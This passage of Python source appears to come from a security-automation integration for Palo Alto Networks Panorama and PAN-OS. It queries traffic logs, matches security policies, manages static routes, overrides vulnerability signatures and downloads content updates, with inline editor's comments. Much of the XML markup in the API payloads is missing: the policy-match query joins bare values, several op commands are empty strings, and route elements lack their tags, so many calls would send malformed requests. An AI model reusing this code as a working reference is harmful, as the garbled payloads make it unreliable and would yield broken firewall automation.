URL,\n 'GET',\n params=params,\n )\n\n return result\n\n\ndef panorama_query_logs_command(args: dict):\n \"\"\"\n Query logs\n \"\"\"\n log_type = args.get('log-type')\n number_of_logs = args.get('number_of_logs')\n query = args.get('query')\n address_src = args.get('addr-src')\n address_dst = args.get('addr-dst')\n ip_ = args.get('ip')\n zone_src = args.get('zone-src')\n zone_dst = args.get('zone-dst')\n time_generated = args.get('time-generated')\n action = args.get('action')\n port_dst = args.get('port-dst')\n rule = args.get('rule')\n filedigest = args.get('filedigest')\n url = args.get('url')\n if url and url[-1] != '/':\n url += '/'\n\n if query and (address_src or address_dst or zone_src or zone_dst\n or time_generated or action or port_dst or rule or url or filedigest):\n raise Exception('Use the free query argument or the fixed search parameters arguments to build your query.')\n\n result = panorama_query_logs(log_type, number_of_logs, query, address_src, address_dst, ip_,\n zone_src, zone_dst, time_generated, action,\n port_dst, rule, url, filedigest)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. 
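# --- Editor's note (illustrative, not part of the integration) --------------
# build_array_query returns the *entire* accumulated query, so the pattern
# `query += build_array_query(query, ...)` used by most branches of
# build_logs_query duplicates every clause collected so far once a second
# filter is added (the ip_ branch, which assigns the return value instead,
# avoids this). The corrected call shape, plus the expected filter syntax:
#
#     query = build_array_query(query, address_dst, 'addr.dst', 'in')
#
#     build_logs_query('1.1.1.1,2.2.2.2', None, None, None, None, None,
#                      None, None, None, None, None)
#     # -> "((addr.src in '1.1.1.1') or (addr.src in '2.2.2.2'))"
# ---------------------------------------------------------------------------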
Reason is: ' + result['response']['msg']['line']\n raise Exception('Query logs failed' + message)\n else:\n raise Exception('Query logs failed.')\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result']:\n raise Exception('Missing JobID in response.')\n\n query_logs_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending',\n 'LogType': log_type,\n 'Message': result['response']['result']['msg']['line']\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Logs:', query_logs_output, ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_output}\n })\n\n\ndef panorama_check_logs_status_command(job_id: str):\n \"\"\"\n Check query logs status\n \"\"\"\n job_ids = argToList(job_id)\n for job_id in job_ids:\n result = panorama_get_traffic_logs(job_id)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query logs failed' + message)\n else:\n raise Exception('Query logs failed.')\n\n query_logs_status_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n if result['response']['result']['job']['status'] == 'FIN':\n query_logs_status_output['Status'] = 'Completed'\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Logs status:', query_logs_status_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_status_output}\n })\n\n\ndef prettify_log(log: dict):\n pretty_log = {}\n\n if 'action' in log:\n pretty_log['Action'] = log['action']\n if 'app' in log:\n pretty_log['Application'] = log['app']\n if 'bytes' in log:\n pretty_log['Bytes'] = log['bytes']\n if 'bytes_received' in log:\n pretty_log['BytesReceived'] = log['bytes_received']\n if 'bytes_sent' in log:\n pretty_log['BytesSent'] = log['bytes_sent']\n if 'category' in log:\n pretty_log['CategoryOrVerdict'] = log['category']\n if 'device_name' in log:\n pretty_log['DeviceName'] = log['device_name']\n if 'dst' in log:\n pretty_log['DestinationAddress'] = log['dst']\n if 'dstuser' in log:\n pretty_log['DestinationUser'] = log['dstuser']\n if 'dstloc' in log:\n pretty_log['DestinationCountry'] = log['dstloc']\n if 'dport' in log:\n pretty_log['DestinationPort'] = log['dport']\n if 'filedigest' in log:\n pretty_log['FileDigest'] = log['filedigest']\n if 'filename' in log:\n pretty_log['FileName'] = log['filename']\n if 'filetype' in log:\n pretty_log['FileType'] = log['filetype']\n if 'from' in log:\n pretty_log['FromZone'] = log['from']\n if 'misc' in log:\n pretty_log['URLOrFilename'] = log['misc']\n if 'natdst' in log:\n pretty_log['NATDestinationIP'] = log['natdst']\n if 'natdport' in log:\n pretty_log['NATDestinationPort'] = log['natdport']\n if 'natsrc' in log:\n pretty_log['NATSourceIP'] = log['natsrc']\n if 'natsport' in log:\n pretty_log['NATSourcePort'] = 
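# --- Editor's aside (illustrative sketch, not part of the integration) ------
# Every *status* command in this section follows the same contract: re-query
# the job until its status leaves 'PEND' and reaches 'FIN'. A minimal
# caller-side helper built on panorama_get_traffic_logs; the timeout and
# interval values are this editor's choice, not taken from the source:
import time

def wait_for_log_query(job_id: str, timeout: int = 300, interval: int = 10) -> dict:
    # Poll a PAN-OS log-query job until it finishes or the timeout expires.
    deadline = time.time() + timeout
    while time.time() < deadline:
        result = panorama_get_traffic_logs(job_id)
        if result['response']['result']['job']['status'] == 'FIN':
            return result
        time.sleep(interval)
    raise TimeoutError(f'Job {job_id} did not finish within {timeout} seconds.')
# ---------------------------------------------------------------------------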
log['natsport']\n if 'pcap_id' in log:\n pretty_log['PCAPid'] = log['pcap_id']\n if 'proto' in log:\n pretty_log['IPProtocol'] = log['proto']\n if 'recipient' in log:\n pretty_log['Recipient'] = log['recipient']\n if 'rule' in log:\n pretty_log['Rule'] = log['rule']\n if 'rule_uuid' in log:\n pretty_log['RuleID'] = log['rule_uuid']\n if 'receive_time' in log:\n pretty_log['ReceiveTime'] = log['receive_time']\n if 'sender' in log:\n pretty_log['Sender'] = log['sender']\n if 'sessionid' in log:\n pretty_log['SessionID'] = log['sessionid']\n if 'serial' in log:\n pretty_log['DeviceSN'] = log['serial']\n if 'severity' in log:\n pretty_log['Severity'] = log['severity']\n if 'src' in log:\n pretty_log['SourceAddress'] = log['src']\n if 'srcloc' in log:\n pretty_log['SourceCountry'] = log['srcloc']\n if 'srcuser' in log:\n pretty_log['SourceUser'] = log['srcuser']\n if 'sport' in log:\n pretty_log['SourcePort'] = log['sport']\n if 'thr_category' in log:\n pretty_log['ThreatCategory'] = log['thr_category']\n if 'threatid' in log:\n pretty_log['Name'] = log['threatid']\n if 'tid' in log:\n pretty_log['ID'] = log['tid']\n if 'to' in log:\n pretty_log['ToZone'] = log['to']\n if 'time_generated' in log:\n pretty_log['TimeGenerated'] = log['time_generated']\n if 'url_category_list' in log:\n pretty_log['URLCategoryList'] = log['url_category_list']\n if 'vsys' in log:\n pretty_log['Vsys'] = log['vsys']\n\n return pretty_log\n\n\ndef prettify_logs(logs: Union[list, dict]):\n if not isinstance(logs, list): # handle case of only one log that matched the query\n return prettify_log(logs)\n pretty_logs_arr = []\n for log in logs:\n pretty_log = prettify_log(log)\n pretty_logs_arr.append(pretty_log)\n return pretty_logs_arr\n\n\ndef panorama_get_logs_command(args: dict):\n ignore_auto_extract = args.get('ignore_auto_extract') == 'true'\n job_ids = argToList(args.get('job_id'))\n for job_id in job_ids:\n result = panorama_get_traffic_logs(job_id)\n log_type_dt = demisto.dt(demisto.context(), f'Panorama.Monitor(val.JobID === \"{job_id}\").LogType')\n if isinstance(log_type_dt, list):\n log_type = log_type_dt[0]\n else:\n log_type = log_type_dt\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. 
Reason is: ' + result['response']['msg']['line']\n raise Exception('Query logs failed' + message)\n else:\n raise Exception('Query logs failed.')\n\n query_logs_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n\n if result['response']['result']['job']['status'] != 'FIN':\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Logs status:', query_logs_output,\n ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_output}\n })\n else: # FIN\n query_logs_output['Status'] = 'Completed'\n if 'response' not in result or 'result' not in result['response'] or 'log' not in result['response'][\n 'result'] \\\n or 'logs' not in result['response']['result']['log']:\n raise Exception('Missing logs in response.')\n\n logs = result['response']['result']['log']['logs']\n if logs['@count'] == '0':\n human_readable = f'No {log_type} logs matched the query.'\n else:\n pretty_logs = prettify_logs(logs['entry'])\n query_logs_output['Logs'] = pretty_logs\n human_readable = tableToMarkdown('Query ' + log_type + ' Logs:', query_logs_output['Logs'],\n ['TimeGenerated', 'SourceAddress', 'DestinationAddress', 'Application',\n 'Action', 'Rule', 'URLOrFilename'], removeNull=True)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'IgnoreAutoExtract': ignore_auto_extract,\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_output}\n })\n\n\n''' Security Policy Match'''\n\n\ndef build_policy_match_query(application: Optional[str] = None, category: Optional[str] = None,\n destination: Optional[str] = None,\n destination_port: Optional[str] = None, from_: Optional[str] = None,\n to_: Optional[str] = None,\n protocol: Optional[str] = None, source: Optional[str] = None,\n source_user: Optional[str] = None):\n query = ''\n if from_:\n query += f'{from_}'\n if to_:\n query += f'{to_}'\n if source:\n query += f'{source}'\n if destination:\n query += f'{destination}'\n if destination_port:\n query += f'{destination_port}'\n if protocol:\n query += f'{protocol}'\n if source_user:\n query += f'{source_user}'\n if application:\n query += f'{application}'\n if category:\n query += f'{category}'\n query += ''\n\n return query\n\n\ndef panorama_security_policy_match(application: Optional[str] = None, category: Optional[str] = None,\n destination: Optional[str] = None, destination_port: Optional[str] = None,\n from_: Optional[str] = None, to_: Optional[str] = None,\n protocol: Optional[str] = None, source: Optional[str] = None,\n source_user: Optional[str] = None):\n params = {'type': 'op', 'key': API_KEY,\n 'cmd': build_policy_match_query(application, category, destination, destination_port, from_, to_,\n protocol, source, source_user)}\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result['response']['result']\n\n\ndef prettify_matching_rule(matching_rule: dict):\n pretty_matching_rule = {}\n\n if '@name' in matching_rule:\n pretty_matching_rule['Name'] = matching_rule['@name']\n if 'from' in 
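# --- Editor's note ----------------------------------------------------------
# The f-strings in build_policy_match_query above have lost their XML tags
# (most likely stripped during text extraction); as written they concatenate
# bare values. The PAN-OS "test security-policy-match" op command wraps each
# field in an element. A hedged reconstruction -- the tag layout is this
# editor's assumption, not confirmed by the source:
#
#     query = '<test><security-policy-match>'
#     if from_:
#         query += f'<from>{from_}</from>'
#     if to_:
#         query += f'<to>{to_}</to>'
#     ...  # one element per populated field
#     query += '</security-policy-match></test>'
# ---------------------------------------------------------------------------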
matching_rule:\n pretty_matching_rule['From'] = matching_rule['from']\n if 'source' in matching_rule:\n pretty_matching_rule['Source'] = matching_rule['source']\n if 'to' in matching_rule:\n pretty_matching_rule['To'] = matching_rule['to']\n if 'destination' in matching_rule:\n pretty_matching_rule['Destination'] = matching_rule['destination']\n if 'category' in matching_rule:\n pretty_matching_rule['Category'] = matching_rule['category']\n if 'action' in matching_rule:\n pretty_matching_rule['Action'] = matching_rule['action']\n\n return pretty_matching_rule\n\n\ndef prettify_matching_rules(matching_rules: Union[list, dict]):\n if not isinstance(matching_rules, list): # handle case of only one log that matched the query\n return prettify_matching_rule(matching_rules)\n\n pretty_matching_rules_arr = []\n for matching_rule in matching_rules:\n pretty_matching_rule = prettify_matching_rule(matching_rule)\n pretty_matching_rules_arr.append(pretty_matching_rule)\n\n return pretty_matching_rules_arr\n\n\ndef prettify_query_fields(application: Optional[str] = None, category: Optional[str] = None,\n destination: Optional[str] = None, destination_port: Optional[str] = None,\n from_: Optional[str] = None, to_: Optional[str] = None, protocol: Optional[str] = None,\n source: Optional[str] = None, source_user: Optional[str] = None):\n pretty_query_fields = {'Source': source, 'Destination': destination, 'Protocol': protocol}\n if application:\n pretty_query_fields['Application'] = application\n if category:\n pretty_query_fields['Category'] = category\n if destination_port:\n pretty_query_fields['DestinationPort'] = destination_port\n if from_:\n pretty_query_fields['From'] = from_\n if to_:\n pretty_query_fields['To'] = to_\n if source_user:\n pretty_query_fields['SourceUser'] = source_user\n return pretty_query_fields\n\n\ndef panorama_security_policy_match_command(args: dict):\n if not VSYS:\n raise Exception(\"The 'panorama-security-policy-match' command is only relevant for a Firewall instance.\")\n\n application = args.get('application')\n category = args.get('category')\n destination = args.get('destination')\n destination_port = args.get('destination-port')\n from_ = args.get('from')\n to_ = args.get('to')\n protocol = args.get('protocol')\n source = args.get('source')\n source_user = args.get('source-user')\n\n matching_rules = panorama_security_policy_match(application, category, destination, destination_port, from_, to_,\n protocol, source, source_user)\n if not matching_rules:\n return_results('The query did not match a Security policy.')\n else:\n ec_ = {'Rules': prettify_matching_rules(matching_rules['rules']['entry']),\n 'QueryFields': prettify_query_fields(application, category, destination, destination_port,\n from_, to_, protocol, source, source_user),\n 'Query': build_policy_match_query(application, category, destination, destination_port,\n from_, to_, protocol, source, source_user)}\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': matching_rules,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Matching Security Policies:', ec_['Rules'],\n ['Name', 'Action', 'From', 'To', 'Source', 'Destination', 'Application'],\n removeNull=True),\n 'EntryContext': {\"Panorama.SecurityPolicyMatch(val.Query == obj.Query)\": ec_}\n })\n\n\n''' Static Routes'''\n\n\ndef prettify_static_route(static_route: Dict, virtual_router: str, template: Optional[str] = None) -> Dict[str, str]:\n pretty_static_route: Dict = 
{}\n\n    if '@name' in static_route:\n        pretty_static_route['Name'] = static_route['@name']\n    if 'bfd' in static_route and 'profile' in static_route['bfd']:\n        pretty_static_route['BFDprofile'] = static_route['bfd']['profile']\n    if 'destination' in static_route:\n        if '@dirtyId' in static_route['destination']:\n            pretty_static_route['Uncommitted'] = True\n        else:\n            pretty_static_route['Destination'] = static_route['destination']\n    if 'metric' in static_route:\n        pretty_static_route['Metric'] = int(static_route['metric'])\n    if 'nexthop' in static_route:\n        if '@dirtyId' in static_route['nexthop']:\n            pretty_static_route['Uncommitted'] = True\n        else:\n            nexthop: Dict[str, str] = static_route['nexthop']\n            if 'ip-address' in nexthop:\n                pretty_static_route['NextHop'] = nexthop['ip-address']\n            elif 'next-vr' in static_route['nexthop']:\n                pretty_static_route['NextHop'] = nexthop['next-vr']\n            elif 'fqdn' in static_route['nexthop']:\n                pretty_static_route['NextHop'] = nexthop['fqdn']\n            elif 'discard' in static_route['nexthop']:\n                pretty_static_route['NextHop'] = nexthop['discard']\n    if 'route-table' in static_route:\n        route_table = static_route['route-table']\n        if 'unicast' in route_table:\n            pretty_static_route['RouteTable'] = 'Unicast'\n        elif 'multicast' in route_table:\n            pretty_static_route['RouteTable'] = 'Multicast'\n        elif 'both' in route_table:\n            pretty_static_route['RouteTable'] = 'Both'\n        else:  # route table is no-install\n            pretty_static_route['RouteTable'] = 'No install'\n    pretty_static_route['VirtualRouter'] = virtual_router\n    if template:\n        pretty_static_route['Template'] = template\n\n    return pretty_static_route\n\n\ndef prettify_static_routes(static_routes: Union[dict, list], virtual_router: str, template: Optional[str] = None):\n    if not isinstance(static_routes, list):  # handle case of only one static route in a virtual router\n        return prettify_static_route(static_routes, virtual_router, template)\n\n    pretty_static_route_arr = []\n    for static_route in static_routes:\n        pretty_static_route = prettify_static_route(static_route, virtual_router, template)\n        pretty_static_route_arr.append(pretty_static_route)\n\n    return pretty_static_route_arr\n\n\n@logger\ndef panorama_list_static_routes(xpath_network: str, virtual_router: str, show_uncommitted: bool) -> Dict[str, str]:\n    action = 'get' if show_uncommitted else 'show'\n    params = {\n        'action': action,\n        'type': 'config',\n        'xpath': f'{xpath_network}/virtual-router/entry[@name=\'{virtual_router}\']/routing-table/ip/static-route',\n        'key': API_KEY\n    }\n    result = http_request(URL, 'GET', params=params)\n    return result['response']['result']\n\n\ndef panorama_list_static_routes_command(args: dict):\n    \"\"\"\n    List all static routes of a virtual router\n    \"\"\"\n    template = args.get('template')\n    xpath_network, template = set_xpath_network(template)\n    virtual_router = args['virtual_router']\n    show_uncommitted = args.get('show_uncommitted') == 'true'\n    virtual_router_object = panorama_list_static_routes(xpath_network, virtual_router, show_uncommitted)\n\n    if 'static-route' not in virtual_router_object or 'entry' not in virtual_router_object['static-route']:\n        human_readable = 'The Virtual Router does not exist or has no static routes configured.'\n        static_routes = virtual_router_object\n    else:\n        static_routes = prettify_static_routes(virtual_router_object['static-route']['entry'], virtual_router, template)\n        table_header = f'Displaying all Static Routes for the Virtual Router: {virtual_router}'\n        headers = ['Name', 'Destination', 'NextHop', 
'Uncommitted', 'RouteTable', 'Metric', 'BFDprofile']\n human_readable = tableToMarkdown(name=table_header, t=static_routes, headers=headers, removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': virtual_router_object,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\"Panorama.StaticRoutes(val.Name == obj.Name)\": static_routes}\n })\n\n\n@logger\ndef panorama_get_static_route(xpath_network: str, virtual_router: str, static_route_name: str) -> Dict[str, str]:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': f'{xpath_network}/virtual-router/entry[@name=\\'{virtual_router}\\']/routing-table/ip/'\n f'static-route/entry[@name=\\'{static_route_name}\\']',\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n return result['response']['result']\n\n\ndef panorama_get_static_route_command(args: dict):\n \"\"\"\n Get a static route of a virtual router\n \"\"\"\n template = args.get('template')\n xpath_network, template = set_xpath_network(template)\n virtual_router = args['virtual_router']\n static_route_name = args['static_route']\n static_route_object = panorama_get_static_route(xpath_network, virtual_router, static_route_name)\n if '@count' in static_route_object and int(static_route_object['@count']) < 1:\n raise Exception('Static route does not exist.')\n static_route = prettify_static_route(static_route_object['entry'], virtual_router, template)\n table_header = f'Static route: {static_route_name}'\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': static_route_object,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown(name=table_header, t=static_route, removeNull=True),\n 'EntryContext': {\n \"Panorama.StaticRoutes(val.Name == obj.Name)\": static_route\n }\n })\n\n\n@logger\ndef panorama_add_static_route(xpath_network: str, virtual_router: str, static_route_name: str, destination: str,\n nexthop_type: str, nexthop_value: str, interface: str = None,\n metric: str = None) -> Dict[str, str]:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'key': API_KEY,\n 'xpath': f'{xpath_network}/virtual-router/entry[@name=\\'{virtual_router}\\']/'\n f'routing-table/ip/static-route/entry[@name=\\'{static_route_name}\\']',\n 'element': f'{destination}'\n f'<{nexthop_type}>{nexthop_value}'\n }\n if interface:\n params[\"element\"] = f'{params[\"element\"]}{interface}'\n if metric:\n params['element'] = f'{params[\"element\"]}{metric}'\n\n result = http_request(URL, 'GET', params=params)\n return result['response']\n\n\ndef panorama_add_static_route_command(args: dict):\n \"\"\"\n Add a Static Route\n \"\"\"\n template = args.get('template')\n xpath_network, template = set_xpath_network(template)\n virtual_router = args.get('virtual_router')\n static_route_name = args.get('static_route')\n destination = args.get('destination')\n nexthop_type = args.get('nexthop_type')\n nexthop_value = args.get('nexthop_value')\n interface = args.get('interface', None)\n metric = args.get('metric', None)\n\n if nexthop_type == 'fqdn':\n # Only from PAN-OS 9.x, creating a static route based on FQDN nexthop is available.\n major_version = get_pan_os_major_version()\n\n if major_version <= 8:\n raise Exception('Next Hop of type FQDN is only available for PAN-OS 9.x instances.')\n static_route = panorama_add_static_route(xpath_network, virtual_router, static_route_name, destination,\n 
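# --- Editor's note ----------------------------------------------------------
# The 'element' assembled in panorama_add_static_route above has lost most of
# its XML markup in extraction (only '<{nexthop_type}>' survived). The config
# API expects a complete element tree; a reconstruction under that assumption,
# not confirmed by the source:
#
#     'element': f'<destination>{destination}</destination>'
#                f'<nexthop><{nexthop_type}>{nexthop_value}</{nexthop_type}></nexthop>'
#     # and, when given:
#     params['element'] += f'<interface>{interface}</interface>'
#     params['element'] += f'<metric>{metric}</metric>'
# ---------------------------------------------------------------------------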
nexthop_type, nexthop_value, interface, metric)\n human_readable = f'New uncommitted static route {static_route_name} configuration added.'\n entry_context = {\n 'Name': static_route_name,\n 'VirtualRouter': virtual_router,\n 'Destination': destination,\n 'NextHop': nexthop_value,\n }\n if interface:\n entry_context['Interface'] = interface\n if metric:\n entry_context['Metric'] = metric\n if template:\n entry_context['Template'] = template\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': static_route,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\"Panorama.StaticRoutes(val.Name == obj.Name)\": static_route}\n })\n\n\ndef panorama_override_vulnerability(threatid: str, vulnerability_profile: str, drop_mode: str):\n xpath = \"{}profiles/vulnerability/entry[@name='{}']/threat-exception/entry[@name='{}']/action\".format(\n XPATH_OBJECTS,\n vulnerability_profile,\n threatid)\n params = {'action': 'set',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY,\n 'element': \"<{0}>\".format(drop_mode)\n }\n\n return http_request(\n URL,\n 'POST',\n body=params,\n )\n\n\n@logger\ndef panorama_get_predefined_threats_list(target: str):\n \"\"\"\n Get the entire list of predefined threats as a file in Demisto\n \"\"\"\n params = {\n 'type': 'op',\n 'cmd': '/predefined/threats',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_get_predefined_threats_list_command(target: Optional[str] = None):\n result = panorama_get_predefined_threats_list(target)\n return_results(fileResult('predefined-threats.json', json.dumps(result['response']['result']).encode('utf-8')))\n\n\ndef panorama_block_vulnerability(args: dict):\n \"\"\"\n Override vulnerability signature such that it is in block mode\n \"\"\"\n threatid = args.get('threat_id', '')\n vulnerability_profile = args.get('vulnerability_profile', '')\n drop_mode = args.get('drop_mode', 'drop')\n\n threat = panorama_override_vulnerability(threatid, vulnerability_profile, drop_mode)\n threat_output = {'ID': threatid, 'NewAction': drop_mode}\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': threat,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Threat with ID {} overridden.'.format(threatid),\n 'EntryContext': {\n \"Panorama.Vulnerability(val.Name == obj.Name)\": threat_output\n }\n })\n\n\n@logger\ndef panorama_delete_static_route(xpath_network: str, virtual_router: str, route_name: str) -> Dict[str, str]:\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': f'{xpath_network}/virtual-router/entry[@name=\\'{virtual_router}\\']/'\n f'routing-table/ip/static-route/entry[@name=\\'{route_name}\\']',\n 'key': API_KEY\n }\n result = http_request(URL, 'DELETE', params=params)\n return result\n\n\ndef panorama_delete_static_route_command(args: dict):\n \"\"\"\n Delete a Static Route\n \"\"\"\n template = args.get('template')\n xpath_network, template = set_xpath_network(template)\n virtual_router = args['virtual_router']\n route_name = args['route_name']\n deleted_static_route = panorama_delete_static_route(xpath_network, virtual_router, route_name)\n entry_context = {\n 'Name': route_name,\n 'Deleted': True\n }\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': deleted_static_route,\n 'ReadableContentsFormat': formats['markdown'],\n 
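# --- Editor's note ----------------------------------------------------------
# Two payloads above also lost XML markup during extraction:
#  * panorama_override_vulnerability posts 'element': "<{0}>".format(drop_mode)
#    with no closing tag; the original presumably sent a complete element for
#    the action node, e.g. "<{0}/>".format(drop_mode) -- an assumption, not
#    confirmed by the source.
#  * panorama_get_predefined_threats_list passes the bare xpath
#    '/predefined/threats' as 'cmd'; op commands are normally XML, so the
#    original likely wrapped it (again an assumption) in something like a
#    <show><predefined>...</predefined></show> request.
# ---------------------------------------------------------------------------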
'HumanReadable': f'The static route: {route_name} was deleted. Changes are not committed.',\n 'EntryContext': {\"Panorama.StaticRoutes(val.Name == obj.Name)\": entry_context} # add key -> deleted: true\n })\n\n\ndef panorama_show_device_version(target: str = None):\n params = {\n 'type': 'op',\n 'cmd': '',\n 'key': API_KEY\n }\n if target:\n params['target'] = target\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result['response']['result']['system']\n\n\ndef panorama_show_device_version_command(target: Optional[str] = None):\n \"\"\"\n Get device details and show message in war room\n \"\"\"\n response = panorama_show_device_version(target)\n\n info_data = {\n 'Devicename': response['devicename'],\n 'Model': response['model'],\n 'Serial': response['serial'],\n 'Version': response['sw-version']\n }\n entry_context = {\"Panorama.Device.Info(val.Devicename === obj.Devicename)\": info_data}\n headers = ['Devicename', 'Model', 'Serial', 'Version']\n human_readable = tableToMarkdown('Device Version:', info_data, headers=headers, removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': response,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\n@logger\ndef panorama_download_latest_content_update_content(target: str):\n params = {\n 'type': 'op',\n 'target': target,\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_download_latest_content_update_command(target: Optional[str] = None):\n \"\"\"\n Download content and show message in war room\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('Download latest content is only supported on Firewall (not Panorama).')\n result = panorama_download_latest_content_update_content(target)\n\n if 'result' in result['response']:\n # download has been given a jobid\n download_status_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n entry_context = {\"Panorama.Content.Download(val.JobID == obj.JobID)\": download_status_output}\n human_readable = tableToMarkdown('Content download:',\n download_status_output, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no download took place\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_content_update_download_status(target: str, job_id: str):\n params = {\n 'type': 'op',\n 'cmd': f'{job_id}',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_content_update_download_status_command(args: dict):\n \"\"\"\n Check jobID of content update download status\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('Content download status is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n job_id = args['job_id']\n result = panorama_content_update_download_status(target, job_id)\n\n content_download_status = {\n 'JobID': result['response']['result']['job']['id']\n }\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n content_download_status['Status'] = 'Completed'\n else:\n 
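# --- Editor's note ----------------------------------------------------------
# The 'cmd' values in this section and the ones that follow appear empty or
# reduced to a bare interpolation ('cmd': '', 'cmd': f'{job_id}') because
# their XML bodies were stripped during extraction. Educated reconstructions
# of the usual PAN-OS op commands -- assumptions, not confirmed by the source:
#
#     '<show><system><info></info></system></show>'                      # device version
#     '<request><content><upgrade><download><latest/></download>'
#     '</upgrade></content></request>'                                   # download latest content
#     f'<show><jobs><id>{job_id}</id></jobs></show>'                     # job status checks
#     '<request><content><upgrade><install><version>latest</version>'
#     '</install></upgrade></content></request>'                         # install latest content
#     f'<request><system><software><download><version>{target_version}'
#     f'</version></download></software></system></request>'             # download PAN-OS version
#     f'<request><system><software><install><version>{target_version}'
#     f'</version></install></software></system></request>'              # install PAN-OS version
#     '<request><restart><system></system></restart></request>'          # device reboot
#     f'<show><location><ip>{ip_address}</ip></location></show>'         # IP location lookup
#     '<request><license><info></info></license></request>'              # license info
# ---------------------------------------------------------------------------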
content_download_status['Status'] = 'Failed'\n            content_download_status['Details'] = result['response']['result']['job']\n\n    if result['response']['result']['job']['status'] == 'PEND':\n        content_download_status['Status'] = 'Pending'\n\n    entry_context = {\"Panorama.Content.Download(val.JobID == obj.JobID)\": content_download_status}\n    human_readable = tableToMarkdown('Content download status:', content_download_status,\n                                     ['JobID', 'Status', 'Details'], removeNull=True)\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['markdown'],\n        'HumanReadable': human_readable,\n        'EntryContext': entry_context\n    })\n\n\n@logger\ndef panorama_install_latest_content_update(target: str):\n    params = {\n        'type': 'op',\n        'cmd': 'latest',\n        'target': target,\n        'key': API_KEY\n    }\n    result = http_request(\n        URL,\n        'GET',\n        params=params\n    )\n\n    return result\n\n\ndef panorama_install_latest_content_update_command(target: Optional[str] = None):\n    \"\"\"\n    Install the latest content update and return the installation job ID\n    \"\"\"\n    if DEVICE_GROUP:\n        raise Exception('Content install is only supported on Firewall (not Panorama).')\n    result = panorama_install_latest_content_update(target)\n\n    if 'result' in result['response']:\n        # installation has been given a jobid\n        content_install_info = {\n            'JobID': result['response']['result']['job'],\n            'Status': 'Pending'\n        